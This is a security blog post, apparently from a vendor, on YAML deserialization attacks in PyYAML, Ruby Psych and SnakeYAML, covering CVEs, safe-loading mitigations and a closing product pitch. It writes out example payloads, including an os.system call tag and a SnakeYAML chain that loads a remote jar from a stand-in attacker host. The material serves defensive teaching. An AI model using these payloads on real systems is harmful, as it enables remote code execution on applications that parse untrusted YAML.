Application Security

YAML Deserialization Attacks: The Config File That Runs Code

YAML's type system allows object instantiation during parsing. In many languages, this means a YAML file can execute arbitrary code.

Bob
Application Security Engineer
4 min read

YAML looks innocent. It is a human-readable data format used for configuration files, Kubernetes manifests, CI/CD pipelines, and data serialization. But YAML's specification includes a feature that most developers are unaware of: type tags that instruct the parser to instantiate language-specific objects during deserialization.

This feature turns YAML parsing into code execution. A malicious YAML file can create arbitrary objects, call constructors, and trigger side effects -- all during what the developer thinks is just "reading a config file."

How YAML Deserialization Works

YAML supports type tags (prefixed with !!) that tell the parser how to interpret a value. The built-in tags include !!str, !!int, !!float, and !!bool. But YAML also supports language-specific tags that map to constructors in the host language.

In Python with PyYAML:

!!python/object/apply:os.system ['id']

This instructs the YAML parser to call os.system('id'). When a developer calls yaml.load(data) (without Loader=SafeLoader), the parser executes the system command.

In Ruby with Psych:

--- !ruby/object:Gem::Installer
i: x
--- !ruby/object:Gem::SpecFetcher
i: y

Ruby's YAML parser can instantiate any Ruby class during deserialization. Chaining the right classes can achieve arbitrary code execution.

In Java with SnakeYAML:

!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://evil.com/exploit.jar"]]]]

SnakeYAML's default configuration allows constructing any Java object, including those that load remote code.

Real-World Exploits

CVE-2017-18342 (PyYAML). Any application using yaml.load() without specifying a safe loader was vulnerable to arbitrary code execution. This affected thousands of Python applications and prompted PyYAML to add deprecation warnings for unsafe loading.

CVE-2013-0156 (Ruby on Rails). Rails accepted YAML in HTTP request parameters, and the YAML parser allowed object instantiation. This was one of the most critical Rails vulnerabilities ever discovered, enabling remote code execution on any Rails application.

CVE-2022-1471 (SnakeYAML). The default SnakeYAML constructor allowed arbitrary class instantiation. This affected every Java application that parsed untrusted YAML with default settings, including many Spring Boot applications.

CVE-2021-25646 (Apache Druid). YAML deserialization in Apache Druid's input source configuration allowed remote code execution.

These are not edge cases. YAML deserialization vulnerabilities have been found in Kubernetes components, CI/CD systems, configuration management tools, and web frameworks.

The Language Landscape

Python: yaml.safe_load() is safe. yaml.load() without a Loader argument is unsafe. PyYAML 6.0+ raises a warning for unsafe loading, but many applications still use it.

Ruby: YAML.safe_load() restricts allowed types. YAML.load() allows arbitrary object creation. Ruby 3.1+ changed YAML.load to use safe loading by default.

Java (SnakeYAML): The default Yaml() constructor allows arbitrary class instantiation. Use Yaml(new SafeConstructor()) for safe parsing. SnakeYAML 2.0 made safe construction the default.

Go: Go's gopkg.in/yaml.v3 does not support arbitrary type instantiation, making it safe by default.

JavaScript: js-yaml's safeLoad() function is safe. load() allowed custom types but was deprecated. js-yaml 4.0+ removed unsafe loading entirely.

.NET: .NET YAML libraries (YamlDotNet) have varying safety defaults. Check the specific version and configuration.

Why This Keeps Happening

The pattern repeats because:

  1. A developer needs to parse a YAML file.
  2. They search for "parse YAML [language]" and find the basic load() function.
  3. They use it without knowing about the type instantiation feature.
  4. The application works correctly with legitimate YAML files.
  5. An attacker provides a crafted YAML file.
  6. Code execution.

The fundamental problem is that "parsing a data format" and "deserializing objects" are conflated in many YAML libraries. Developers expect data parsing. They get an object creation engine.

Mitigation

Always use safe loading functions. yaml.safe_load() in Python. YAML.safe_load() in Ruby. new Yaml(new SafeConstructor()) in Java. No exceptions.

Lint for unsafe YAML loading. Bandit rule B506 catches yaml.load() without SafeLoader in Python. Semgrep rules exist for other languages. Add these checks to your CI pipeline.

Validate YAML structure. After safe-loading YAML, validate the resulting data structure against an expected schema. Do not assume the YAML contains what you expect.

Use JSON for untrusted input. If the data comes from an untrusted source, consider using JSON instead of YAML. JSON does not support type tags or object instantiation.

Update YAML libraries. Newer versions of major YAML libraries have changed defaults to be safe. PyYAML 6.0, SnakeYAML 2.0, js-yaml 4.0, and Ruby 3.1 all default to safe loading.

How Safeguard.sh Helps

Safeguard.sh monitors YAML parsing libraries in your dependency tree for known deserialization vulnerabilities. When a YAML library CVE is published, Safeguard.sh maps the impact across your projects, identifying which applications use vulnerable versions and which need updates. For a vulnerability class that has repeatedly enabled remote code execution across multiple language ecosystems, this proactive tracking is essential.

Never miss an update

Weekly insights on software supply chain security, delivered to your inbox.